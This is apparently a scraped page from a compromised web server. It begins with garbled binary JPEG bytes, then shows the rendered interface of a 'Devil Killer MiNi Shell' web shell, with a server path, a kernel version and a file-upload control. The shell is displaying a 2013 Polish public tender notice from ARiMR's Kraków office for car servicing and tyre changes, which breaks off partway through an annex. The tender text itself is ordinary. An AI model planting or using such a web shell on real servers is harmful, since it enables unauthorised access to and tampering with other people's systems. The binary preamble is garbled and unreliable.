JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130418/153920-N-2013.html

<p class="kh_header"><b>Kraków: Usługa przeglądów gwarancyjnych i pogwarancyjnych oraz wymiana ogumienia samochodów znajdujących się na wyposażeniu Małopolskiego Oddziału Regionalnego ARiMR</b><br>
<b>Numer ogłoszenia: 153920 - 2013; data zamieszczenia: 18.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa , ul. Lubicz 25, 31-503 Kraków, woj. małopolskie, tel. 012 6298010, faks 012 4211311.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja wykonawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa przeglądów gwarancyjnych i pogwarancyjnych oraz wymiana ogumienia samochodów znajdujących się na wyposażeniu Małopolskiego Oddziału Regionalnego ARiMR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie zamówienia: Przedmiotem zamówienia są usługi w zakresie przeglądów gwarancyjnych i pogwarancyjnych samochodów, a także wymiany ogumienia, w podziale na następujące zadania:

Zadanie I: samochody marki Skoda, w tym: Octavia Tour 1,6:1 szt. oraz Octavia II: 2 szt. 
Zadanie II: samochody marki Suzuki, w tym: SX4: 3 szt., Jimmy:19 szt., Grand Vitara: 1 szt.
Zadanie III: samochody marki Dacia, w tym: Duster: 3 szt.
Zadanie IV: samochody marki Łada i Fiat, w tym: Niva: 6 sztuk, Albea: 1 szt.
Zadanie V: samochód marki Isuzu: D-max: 1 szt.
Zadanie VI: wymiana ogumienia w samochodach znajdujących się na wyposażeniu Małopolskiego Oddziału Regionalnego ARiMR


1. Ogólne warunki realizacji zamówienia (dotyczy zadań I-V)

Zamówienie obejmuje:

1. Wykonywanie przeglądów gwarancyjnych i pogwarancyjnych. Zamawiający wymaga, aby przeglądy te były wykonywane w zakresie i w sposób wymagany przez producenta samochodów, nie powodujący utraty przez Zamawiającego uprawnień wynikających z udzielonej mu przez producenta samochodów gwarancji. W przypadku odmowy przez producenta samochodów wykonania naprawy gwarancyjnej z powodu wadliwego wykonania przeglądu (w szczególności: nie zachowania reżimu technologicznego, nie wykonania wszystkich czynności lub nie zachowania ich kolejności,  wymaganych przez gwaranta, użycia części zamiennych, materiałów lub płynów eksploatacyjnych albo innych elementów wyposażenia, niezgodnych ze specyfikacją producenta samochodów (gwaranta)) wykonawca zobowiązany będzie do naprawienia wynikłej stąd szkody, w szczególności do poniesienia kosztów naprawy, w zakresie w jakim nie została ona wykonana w ramach gwarancji producenta samochodów. Za wystarczającą podstawą do żądania od wykonawcy naprawienia szkody w powyższym zakresie będzie pisemna odmowa producenta samochodów naprawy gwarancyjnej z podaniem uzasadnienia.
2. Dostawę niezbędnych części zamiennych, materiałów i płynów eksploatacyjnych, które zostały dopuszczone przez producenta w uzgodnieniu z Zamawiającym (nowe) po cenach katalogowych.
3. Demontaż zużytych części i materiałów wynikających z przeglądów oraz ich utylizacja, z zastrzeżeniem, iż Zamawiający może zażądać wydania mu zdemontowanych części lub innych elementów wyposażenia samochodu.
4. Wymianę płynów eksploatacyjnych, montaż nowych materiałów i części zamiennych wynikający z przeglądów. Zamawiający zastrzega sobie prawo do przekazania Wykonawcy własnych płynów eksploatacyjnych, części zamiennych oraz do zakupu części zamiennych we własnym zakresie.
5. Uzyskiwanie każdorazowo zgody Zamawiającego na zamontowanie części innych niż nowe lub oryginalne, dopuszczone przez producenta samochodu, w szczególności dotyczy to tzw. zamienników  lub części regenerowanych.
6. Na wyżej wymienione usługi Wykonawca, udzieli gwarancji, nie krótszej niż 8 m-cy, którą określi w Formularzu ofertowym ( załącznik nr 1A, 1B, 1C, 1D, 1E). Gwarancja na części zamienne zgodna z terminem gwarancji producenta tychże części.
7. Ceny  roboczogodziny obowiązywać będą w odniesieniu do wszystkich zleceń przyjętych do końca okresu obowiązywania umowy i winny uwzględniać wszystkie narzuty oraz ewentualne rabaty określone w Formularzu ofertowym (załącznik 1A, 1B,1C, 1D, 1 E).
8. Koszty materiałowe rozliczane będą zgodnie z cennikiem zawartym w katalogu ASO dla danej marki (dla części oryginalnych) i katalogu InterCars dla zamienników, udzielonymi rabatami oraz wystawionymi na ich podstawie fakturami VAT. Ilość roboczogodzin będzie liczona przy zastosowaniu katalogu ASO dla danej marki samochodów (Skoda, Suzuki, Isuzu, Łada, Dacia, Fiat).
9. Przekazanie przez Zamawiającego pojazdów samochodowych do przeglądu odbywać się będzie każdorazowo na podstawie odrębnego zlecenia w jednej z następujących form wybranych przez Zamawiającego: pisemnie, mailowo, faksem lub telefonicznie.
10. Podstawą do uruchomienia przeglądu przez Wykonawcę jest zaakceptowany kosztorys. W tym celu Wykonawca przyjmując samochód do przeglądu i otwierając zlecenie przedstawi kalkulację przeglądu w postaci kosztorysu. Zamawiający po analizie zatwierdzi kosztorys i odwrotnie, osobiście, mailem lub faksem, przekaże do realizacji. Zamawiający zastrzega konieczność sporządzenia dodatkowego kosztorysu i jego akceptacji wg zasad wyżej wskazanych, w na wypadek rozszerzenia zakresu prac Wykonawcy.
11. Rozliczenie przeglądu odbędzie się każdorazowo na podstawie stawki godzinowej brutto (roboczogodziny) podanej przez wykonawcę w Formularzu ofertowym, przyjmując za podstawę obliczeń normy czasowe wykazane w obowiązujących katalogach ASO. Katalogi norm czasowych będą do wglądu przez Zamawiającego w każdej chwili na żądanie. Rozliczenie części zamiennych będzie dokonywane w oparciu o ceny z aktualnych cenników zawartych w katalogach ASO lub Intercars pomniejszonych o rabaty wymienione w Formularzu ofertowym.
12. Maksymalny czas wykonania przeglądu winien wynieść 3 dni robocze i liczony będzie od momentu wydania samochodu wykonawcy.
13. Szacunkowa liczba przeglądów, ustalona przez Zamawiającego w oparciu o planowany przebieg poszczególnych samochodów przedstawia się następująco: 
Samochody Skoda: Octavia Tour - 1 po 120 000 km, 1 po 135 000 km, 1 po 150 000 km, Octavia II - 1 po 75 000 km, 1 po 90 000 km, 1 po 105 000 km, 1 po 120 000 km, 1 po 135 000 km, 1 po 150 000 km, Samochody Suzuki: Jimny: 7 po 15 000 km, 15 po 30 000 km, 15 po 45 000 km, 8 po 60 000 km, 3 po 90 000 km, 4 po 105 000 km, 4 po 120 000 km, 1 po 135 000 km, SX4: 1 po 120 000 km, 3 po 135 000 km, 3 po 150 000 km, 3 po 165 000 km, Grand Vitara: 1 po 60 000 km, 75 000 km, 1 po 90 000 km, Samochody Dacia Duster - 3 po 60 000 km, 3 po 80 000 km, Samochody marki Łada: Niva 4x4: 6 po 60 000 km, 6 po 70 000 km, 6 po 80 000 km, 6 po 90 000 km, Samochód Fiat: Albea: 1 po 160 000 km, Samochód Isuzu: D-Max - 1 po 70 000 km, 1 po 80 000 km, 1 po 90 000 km.
14. Zamawiający oświadcza, iż podane w pkt 13 liczby przeglądów mają charakter przybliżony, a rzeczywista liczba zleconych przeglądów zależeć będzie od przebiegu poszczególnych samochodów.
15. Zamawiający wymaga, aby przeglądy wykonywane były w granicach administracyjnych Miasta Krakowa, w warunkach warsztatowych, z zachowaniem należytej staranności (oraz przy przestrzeganiu przepisów prawa w szczególności przepisów bezpieczeństwa).
4. Ogólne warunki realizacji zamówienia (dotyczy Zadania VI)
1. Na zlecenie Zamawiającego Wykonawca wykonywać będzie wymianę opon, dwukrotnie w roku, raz na opony zimowe i raz na opony letnie.
2. Usługa, o której mowa w pkt 1 obejmować będzie: demontaż kół z samochodu, ściągnięcie opon z felg, wyczyszczenie felg i opon,  kontrolę rantu felgi i w razie konieczności wykonanie prostowania (tam gdzie jest to możliwe przy użyciu ręcznych narzędzi), każdorazowej wymianie wentyli, wykonanie uszczelnienia przy użyciu właściwych substancji klejących, założenie opon na felgi, pompowanie opon do poziomu ciśnienia wskazywanego przez producenta samochodu, wyważenie opon, montaż opon na samochodzie, z zastrzeżeniem, iż wartość momentu obrotowego przy dokręceniu śrub mocujących powinna być zgodna ze wskazaniami producenta samochodu.
3. Wykonawca wykona usługę wymiany opon  w ciągu 2 dni roboczych od dnia zgłoszenia dokonanego przez Zamawiającego. Zgłoszenie to może zostać dokonane w formie telefonicznej lub mailowej.
4. Zamawiający oświadcza, iż w ramach jednego zgłoszenia liczba samochodów, w których maja zostać wymienione opony nie przekroczy 10 sztuk.
5. Wymiana opon będzie wykonywana w warunkach warsztatowych w granicach administracyjnych Miasta Krakowa.
6. W przypadku wykonania usługi w sposób niezgodny  z wymogami stawianymi przez Zamawiającego, Wykonawca zobowiązany będzie do usunięcia ewentualnych usterek lub wad w ciągu jednego dnia roboczego od dnia ich zgłoszenia.

5. Zamawiający dopuszcza złożenie ofert na każde, kilka wybranych lub wszystkie zadania.
6. Zamawiający dopuszcza powierzenie wykonywania całości lub części zamówienia podwykonawcom..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, iż:
dysponuje minimum dwoma stanowiskami usytuowanymi w jednym budynku, każde wyposażone w podnośnik hydrauliczny (dotyczy zadania V), dysponuje minimum trzema stanowiskami usytuowanymi w jednym budynku, każde wyposażone w podnośnik hydrauliczny (dotyczy zadań I, II, III i IV), dysponuje komputerem do obsługi diagnostycznej samochodów Skoda wraz z aktualną licencją producenta pojazdów tej marki na oprogramowanie, w przypadku ubiegania się o Zadanie I, komputerem do obsługi diagnostycznej samochodów Suzuki wraz z aktualną licencją producenta pojazdów tej marki na oprogramowanie, w przypadku ubiegania się o Zadanie II, komputerem do obsługi diagnostycznej samochodów Dacia wraz z aktualną licencją producenta pojazdów tej marki na oprogramowanie, w przypadku ubiegania się o Zadanie III, komputerem do obsługi diagnostycznej samochodów Łada i Fiat wraz z aktualną licencją  na oprogramowanie, w przypadku ubiegania się o Zadanie IV, komputerem do obsługi diagnostycznej samochodów Isuzu wraz z aktualną licencją producenta pojazdów tej marki na oprogramowanie, w przypadku ubiegania się o Zadanie V, dysponuje minimum po jednej sztuce następujących narzędzi i elementów wyposażenia warsztatu (dotyczy każdego z Zadań I-V):
ściągacz do kolumn Mc Phersona, zestaw do blokowania trzpienia amortyzatora
przyrząd służący do sprawdzania temperatury wrzenia płynu hamulcowego,
przyrząd służący do kontroli ustawienia świateł,
ruchoma podpora (kobyłka) do md skrzyni biegów,
oprzyrządowanie do wymiany płynu hamulcowego
oprzyrządowanie do wymiany oleju silnikowego
przyrząd do sprawdzania luzów zawieszenia
urządzenie do ustawiania geometrii kół
urządzenie służące do sprawdzania geometrii kół (pomiar winien dotyczyć 4 kół jednocześnie)
rolki hamulcowe
shock tester (urządzenie do sprawdzania amortyzatorów)
klucz dynamometryczny
wyciąg odsysacz spalin
tester akumulatorów
dysponuje minimum jedną sztuką urządzenia do kontroli szczelności i napełniania klimatyzacji (dotyczy Zadań I-III oraz V) 
W przypadku zadania VI Zamawiający uzna, iż wykonawca dysponuje odpowiednim potencjałem technicznym jeżeli Wykonawca wykaże, że: 
dysponuje co najmniej dwoma stanowiskami do wymiany kół każde wyposażone w :
podnośnik
wyważarkę do kół
montażownicę do kół trzyramienną
agregat do pompowania kół
myjkę do kół</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże, iż:  dysponuje minimum czterema osobami, w tym minimum trzema mechanikami samochodowymi legitymujących się kierunkowym wykształceniem zawodowym oraz minimum jednym elektromechanikiem samochodowym legitymującym się kierunkowym wykształceniem zawodowym, osoby te musza posiadać co najmniej 2letnie doświadczenie w realizacji usługi naprawy samochodów (dotyczy zadań I, II, III, IV)
dysponuje minimum dwoma osobami, w tym minimum jednym mechanikiem samochodowym legitymującym się kierunkowym wykształceniem zawodowym oraz minimum jednym elektromechanikiem samochodowym legitymującym się kierunkowym wykształceniem zawodowym, osoby te musza posiadać co najmniej 2letnie doświadczenie w realizacji usługi naprawy samochodów (dotyczy zadania V)

dysponuje minimum trzema osobami, w tym minimum dwiema wykonującymi bezpośrednio wymianę opon, osoby te musza posiadać co najmniej 2letnie doświadczenie w realizacji usługi wymiany opon (dotyczy Zadania VI)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
- działania siły wyższej lub wystąpienia stanu wyższej konieczności,
- wystąpienia warunków atmosferycznych całkowicie uniemożliwiających wykonanie przedmiotu zamówienia w wyznaczonych terminach,
- zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
- zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
- omyłek pisarskich lub błędów rachunkowych,
-  mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
-  jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
- innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2013 godzina 11:00, miejsce: Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków, na Dzienniku Podawczym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi w zakresie przeglądów gwarancyjnych i pogwarancyjnych samochodów - samochody Skoda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Samochody marki Skoda, w tym: Octavia Tour 1,6 - 1 szt. oraz Octavia II - 2 szt. 
Zamówienie obejmuje:

1.Wykonywanie przeglądów gwarancyjnych i pogwarancyjnych. Zamawiający wymaga, aby przeglądy te były wykonywane w zakresie i w sposób wymagany przez producenta samochodów, nie powodujący utraty przez Zamawiającego uprawnień wynikających z udzielonej mu przez producenta samochodów gwarancji. W przypadku odmowy przez producenta samochodów wykonania naprawy gwarancyjnej z powodu wadliwego wykonania przeglądu (w szczególności: nie zachowania reżimu technologicznego, nie wykonania wszystkich czynności lub nie zachowania ich kolejności,  wymaganych przez gwaranta, użycia części zamiennych, materiałów lub płynów eksploatacyjnych albo innych elementów wyposażenia, niezgodnych ze specyfikacją producenta samochodów (gwaranta)) wykonawca zobowiązany będzie do naprawienia wynikłej stąd szkody, w szczególności do poniesienia kosztów naprawy, w zakresie w jakim nie została ona wykonana w ramach gwarancji producenta samochodów. Za wystarczającą podstawą do żądania od wykonawcy naprawienia szkody w powyższym zakresie będzie pisemna odmowa producenta samochodów naprawy gwarancyjnej z podaniem uzasadnienia.
2. Dostawę niezbędnych części zamiennych, materiałów i płynów eksploatacyjnych, które zostały dopuszczone przez producenta w uzgodnieniu z Zamawiającym (nowe) po cenach katalogowych
3.Demontaż zużytych części i materiałów wynikających z przeglądów oraz ich utylizacja, z zastrzeżeniem, iż Zamawiający może zażądać wydania mu zdemontowanych części lub innych elementów wyposażenia samochodu.
4.Wymianę płynów eksploatacyjnych, montaż nowych materiałów i części zamiennych wynikający z przeglądów. Zamawiający zastrzega sobie prawo do przekazania Wykonawcy własnych płynów eksploatacyjnych, części zamiennych oraz do zakupu części zamiennych we własnym zakresie.
5.Uzyskiwanie każdorazowo zgody Zamawiającego na zamontowanie części innych niż nowe lub oryginalne, dopuszczone przez producenta samochodu, w szczególności dotyczy to tzw. zamienników  lub części regenerowanych.
6.Na wyżej wymienione usługi Wykonawca, udzieli gwarancji, nie krótszej niż 8 m-cy, którą określi w Formularzu ofertowym. Gwarancja na części zamienne zgodna z terminem gwarancji producenta tychże części.
7.Ceny  roboczogodziny obowiązywać będą w odniesieniu do wszystkich zleceń przyjętych do końca okresu obowiązywania umowy i winny uwzględniać wszystkie narzuty oraz ewentualne rabaty określone w Formularzu ofertowym.
8.Koszty materiałowe rozliczane będą zgodnie z cennikiem zawartym w katalogu ASO dla danej marki (dla części oryginalnych) i katalogu InterCars dla zamienników, udzielonymi rabatami oraz wystawionymi na ich podstawie fakturami VAT. Ilość roboczogodzin będzie liczona przy zastosowaniu katalogu ASO dla danej marki samochodów.
9.Przekazanie przez Zamawiającego pojazdów samochodowych do przeglądu odbywać się będzie każdorazowo na podstawie odrębnego zlecenia w jednej z następujących form wybranych przez Zamawiającego: pisemnie, mailowo, faksem lub telefonicznie.
10.Podstawą do uruchomienia przeglądu przez Wykonawcę jest zaakceptowany kosztorys. W tym celu Wykonawca przyjmując samochód do przeglądu i otwierając zlecenie przedstawi kalkulację przeglądu w postaci kosztorysu. Zamawiający po analizie zatwierdzi kosztorys i odwrotnie, osobiście, mailem lub faksem, przekaże do realizacji. Zamawiający zastrzega konieczność sporządzenia dodatkowego kosztorysu i jego akceptacji wg zasad wyżej wskazanych, w na wypadek rozszerzenia zakresu prac Wykonawcy.
11.Rozliczenie przeglądu odbędzie się każdorazowo na podstawie stawki godzinowej brutto (roboczogodziny) podanej przez wykonawcę w Formularzu ofertowym, przyjmując za podstawę obliczeń normy czasowe wykazane w obowiązujących katalogach ASO. Katalogi norm czasowych będą do wglądu przez Zamawiającego w każdej chwili na żądanie. Rozliczenie części zamiennych będzie dokonywane w oparciu o ceny z aktualnych cenników zawartych w katalogach ASO lub Intercars pomniejszonych o rabaty wymienione w Formularzu ofertowym.
